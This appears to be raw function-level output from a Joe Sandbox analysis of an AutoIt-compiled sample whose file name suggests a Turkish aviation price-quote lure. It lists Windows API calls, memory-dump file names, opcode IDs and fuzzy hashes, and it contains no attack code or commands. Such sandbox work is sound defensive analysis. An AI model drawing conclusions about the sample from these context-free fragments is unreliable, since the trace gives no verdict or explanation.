                                                                                                                                    • Instruction Fuzzy Hash: 28B10131E2AF408DD72396398831336B65CAFBB2C5F51D71BFCA6B1D16EB2685835240
                                                                                                                                    APIs
                                                                                                                                    • __time64.LIBCMT ref: 0100889B
                                                                                                                                      • Part of subcall function 00FC520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,01008F6E,00000000,?,?,?,?,0100911F,00000000,?), ref: 00FC5213
                                                                                                                                      • Part of subcall function 00FC520A: __aulldiv.LIBCMT ref: 00FC5233
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2893107130-0
                                                                                                                                    • Opcode ID: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                                                                                    • Instruction ID: a744b049d1607cf10e70962d9c40b28320195866b0663cb0716f277ceaaf285f
                                                                                                                                    • Opcode Fuzzy Hash: 53a201c8cda173a25c8cae77ecf3f1841c47eaf01457b24d19925e1a5eae8920
                                                                                                                                    • Instruction Fuzzy Hash: 9B21AF32A256108BD72ACF29D441A52B3E1EBA5311F288E6DD1F5CB2C0CA35B905CB94
                                                                                                                                    APIs
                                                                                                                                    • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 01004C4A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: mouse_event
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 2434400541-0
                                                                                                                                    • Opcode ID: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                                                                                    • Instruction ID: 8fa64b974c4e784b7a08462fc5a32d4556001ef10bcec07d370e257321aa5607
                                                                                                                                    • Opcode Fuzzy Hash: 5467691819165dd9073ab16613d8c14553fc5e259d9b171ca03f362f6370079b
                                                                                                                                    • Instruction Fuzzy Hash: 57D05EA516461E78FCEE0B249A2FF7A15C8E3806C2FC081C973C1CA0C1ECC458404138
                                                                                                                                    APIs
                                                                                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00FF8389), ref: 00FF87D1
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: LogonUser
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1244722697-0
                                                                                                                                    • Opcode ID: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                                                                                    • Instruction ID: c45ea7ede5db869f9ad6826db7eebdd21c6579e56be73f10a9c1ee6bd5ee0580
                                                                                                                                    • Opcode Fuzzy Hash: 17f7bf759fd015af7081b6465bd93b5611ea961b8ac97a9807667aada95ffe95
                                                                                                                                    • Instruction Fuzzy Hash: 6DD05E3226050EABEF118EA4DD01EAE3B69EB04B01F808111FE15D5090C77AD835AF60
                                                                                                                                    APIs
                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 00FCA12A
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ExceptionFilterUnhandled
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3192549508-0
                                                                                                                                    • Opcode ID: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                                                                                    • Instruction ID: df8d1cde32827d8a0a777400c8f38732c52cfdf39c54ae69bd9c18336cb79aed
                                                                                                                                    • Opcode Fuzzy Hash: c9e743fecbfe8cd06a60452b098aa1ed48e5c689674fde609cb375137e77a48f
                                                                                                                                    • Instruction Fuzzy Hash: 72A0113000020EEB8A202E82E808888BFACEA002E0B008020F80C800228BB3A8208A80
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                                                                                    • Instruction ID: 002a779c53e30318d232a434021657b496e268aa2cddefc306a81a40c710389d
                                                                                                                                    • Opcode Fuzzy Hash: df4fd4e3cc4f5131de0e482b52fe08fc65a07666966f9d7d3ece7408127e4d25
                                                                                                                                    • Instruction Fuzzy Hash: 55224831D0414ADBDF388A16C4943BD77A9FF817A4F24406AD642CB5A2DB74AC82FF41
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                    • Instruction ID: 1c5189bf15134f41a52023c7b8e432b0353f148dc6f395ec35a4907960b732f9
                                                                                                                                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                                                                                    • Instruction Fuzzy Hash: 55C1DA326050930AEF5D46398636A3EFBA1AEA37B131A075DD4B3CB1C5EE10C979E650
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                    • Instruction ID: a9662a08dcfd67055497935d93b8215c7e7ba5056ed95b67c277c4ba94e6c1e4
                                                                                                                                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                                                                                    • Instruction Fuzzy Hash: 2FC1E93360515309EF6D4639C676A3EBAA1AE937B131A035DD4B3CB1C5EE20C978F660
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                    • Instruction ID: 2ba69262dfbd7e423e4fd111d6a8d04fc8aeef342fabb155543453edc4f57627
                                                                                                                                    • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                                                                                    • Instruction Fuzzy Hash: 14C1A93260515309EF2D4639C636A3EBBA17EA37B131A075DD4B3CB1C6EE20C979E650
                                                                                                                                    APIs
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0101785B
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0101786D
                                                                                                                                    • DestroyWindow.USER32 ref: 0101787B
                                                                                                                                    • GetDesktopWindow.USER32 ref: 01017895
                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 0101789C
                                                                                                                                    • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 010179DD
                                                                                                                                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 010179ED
                                                                                                                                    • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A35
                                                                                                                                    • GetClientRect.USER32(00000000,?), ref: 01017A41
                                                                                                                                    • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 01017A7B
                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017A9D
                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AB0
                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017ABB
                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 01017AC4
                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AD3
                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 01017ADC
                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017AE3
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01017AEE
                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B00
                                                                                                                                    • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,01032CAC,00000000), ref: 01017B16
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 01017B26
                                                                                                                                    • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 01017B4C
                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 01017B6B
                                                                                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017B8D
                                                                                                                                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 01017D7A
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                     • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                     • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                                                                    • String ID: $AutoIt v3$DISPLAY$static
                                                                                                                                    • API String ID: 2211948467-2373415609
                                                                                                                                    • Opcode ID: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                                                                                    • Instruction ID: a87312f6c36c32f77fd99472d3a018c78e3475eda366d1fe6951e28d8b0a2ef5
                                                                                                                                    • Opcode Fuzzy Hash: 6b23cf48c831c48b82e660c8c12ffb47ae0493a2cb83490cfd2ac4d412fd5e6b
                                                                                                                                    • Instruction Fuzzy Hash: B002A27190010AEFDB24DFA8DC89EAE7BB9FF49350F148158F945AB294CB799D01CB60
                                                                                                                                    APIs
                                                                                                                                    • CharUpperBuffW.USER32(?,?,0102F910), ref: 01023627
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0102364B
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: BuffCharUpperVisibleWindow
                                                                                                                                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                                                                    • API String ID: 4105515805-45149045
                                                                                                                                    • Opcode ID: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                                                                                    • Instruction ID: 58043a03722bf4dccb7da8e57082d6d3e500b6956aff2dcf8ce744147b3d198a
                                                                                                                                    • Opcode Fuzzy Hash: 4b4089e46acc32baaaaf442609e710805428635a06a4d9f89b42b531d56238f2
                                                                                                                                    • Instruction Fuzzy Hash: DBD18B70208311CBCB14EF14C956A6EBBE5BF89384F044468F9C65F3A2CB2DE90ADB51
APIs
• SetTextColor.GDI32(?,00000000), ref: 0102A630
• GetSysColorBrush.USER32(0000000F), ref: 0102A661
• GetSysColor.USER32(0000000F), ref: 0102A66D
• SetBkColor.GDI32(?,000000FF), ref: 0102A687
• SelectObject.GDI32(?,00000000), ref: 0102A696
• InflateRect.USER32(?,000000FF,000000FF), ref: 0102A6C1
• GetSysColor.USER32(00000010), ref: 0102A6C9
• CreateSolidBrush.GDI32(00000000), ref: 0102A6D0
• FrameRect.USER32(?,?,00000000), ref: 0102A6DF
• DeleteObject.GDI32(00000000), ref: 0102A6E6
• InflateRect.USER32(?,000000FE,000000FE), ref: 0102A731
• FillRect.USER32(?,?,00000000), ref: 0102A763
• GetWindowLongW.USER32(?,000000F0), ref: 0102A78E
  • Part of subcall function 0102A8CA: GetSysColor.USER32(00000012), ref: 0102A903
  • Part of subcall function 0102A8CA: SetTextColor.GDI32(?,?), ref: 0102A907
  • Part of subcall function 0102A8CA: GetSysColorBrush.USER32(0000000F), ref: 0102A91D
  • Part of subcall function 0102A8CA: GetSysColor.USER32(0000000F), ref: 0102A928
  • Part of subcall function 0102A8CA: GetSysColor.USER32(00000011), ref: 0102A945
  • Part of subcall function 0102A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0102A953
  • Part of subcall function 0102A8CA: SelectObject.GDI32(?,00000000), ref: 0102A964
  • Part of subcall function 0102A8CA: SetBkColor.GDI32(?,00000000), ref: 0102A96D
  • Part of subcall function 0102A8CA: SelectObject.GDI32(?,?), ref: 0102A97A
  • Part of subcall function 0102A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0102A999
  • Part of subcall function 0102A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0102A9B0
  • Part of subcall function 0102A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0102A9C5
  • Part of subcall function 0102A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0102A9ED
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
• String ID:
• API String ID: 3521893082-0
• Opcode ID: ac4ba8c4a903c493e8f728e01be71cc1a1a4f866a39facbf7530b322a7dc44f2
• Instruction ID: 8c737bc2030b5fc58c2dd347ae1175eec8ccb5b7e262790d8215d70b42370d1d
• Opcode Fuzzy Hash: ac4ba8c4a903c493e8f728e01be71cc1a1a4f866a39facbf7530b322a7dc44f2
• Instruction Fuzzy Hash: 45918D72108312EFD7219F64DC08E5B7BF9FF89361F200A19FAA296194DB7AD844CB51
APIs
• DestroyWindow.USER32(?,?,?), ref: 00FA2CA2
• DeleteObject.GDI32(00000000), ref: 00FA2CE8
• DeleteObject.GDI32(00000000), ref: 00FA2CF3
• DestroyIcon.USER32(00000000,?,?,?), ref: 00FA2CFE
• DestroyWindow.USER32(00000000,?,?,?), ref: 00FA2D09
• SendMessageW.USER32(?,00001308,?,00000000), ref: 00FDC43B
• ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00FDC474
• MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00FDC89D
  • Part of subcall function 00FA1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00FA2036,?,00000000,?,?,?,?,00FA16CB,00000000,?), ref: 00FA1B9A
• SendMessageW.USER32(?,00001053), ref: 00FDC8DA
• SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00FDC8F1
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC907
• ImageList_Destroy.COMCTL32(00000000,?,?), ref: 00FDC912
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
• String ID: 0
• API String ID: 464785882-4108050209
• Opcode ID: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
• Instruction ID: a8e471a248838c62af17c2d61602db85342fb17c389d3510f411a0cf66082228
• Opcode Fuzzy Hash: e1b3287af43bb4c09e51b7deb3c3d0b87d260d1bb54fcfdf3dab86b3d627388a
• Instruction Fuzzy Hash: E912A170A04202EFDB25CF28C884BA9B7E6FF05360F58456AF599CB652C735EC41EB91
APIs
• DestroyWindow.USER32(00000000), ref: 010174DE
• SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0101759D
• SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 010175DB
• AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 010175ED
• CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 01017633
• GetClientRect.USER32(00000000,?), ref: 0101763F
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 01017683
• CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 01017692
• GetStockObject.GDI32(00000011), ref: 010176A2
• SelectObject.GDI32(00000000,00000000), ref: 010176A6
• GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 010176B6
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 010176BF
• DeleteDC.GDI32(00000000), ref: 010176C8
• CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 010176F4
• SendMessageW.USER32(00000030,00000000,00000001), ref: 0101770B
• CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 01017746
• SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0101775A
• SendMessageW.USER32(00000404,00000001,00000000), ref: 0101776B
• CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0101779B
• GetStockObject.GDI32(00000011), ref: 010177A6
• SendMessageW.USER32(00000030,00000000,?,50000000), ref: 010177B1
• ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 010177BB
Strings
Memory Dump Source
• Source File: 00000000.00000002.1491790033.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
• Associated: 00000000.00000002.1491770776.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.000000000102F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491850236.0000000001054000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491911513.000000000105E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1491930865.0000000001067000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_fa0000_TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZA.jbxd
Similarity
• API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
• String ID: AutoIt v3$DISPLAY$msctls_progress32$static
• API String ID: 2910397461-517079104
• Opcode ID: 56aaafdb8da3378a90feb8eaf85fca2b94e3ddb20eaf91956cb3445fc2422bf5
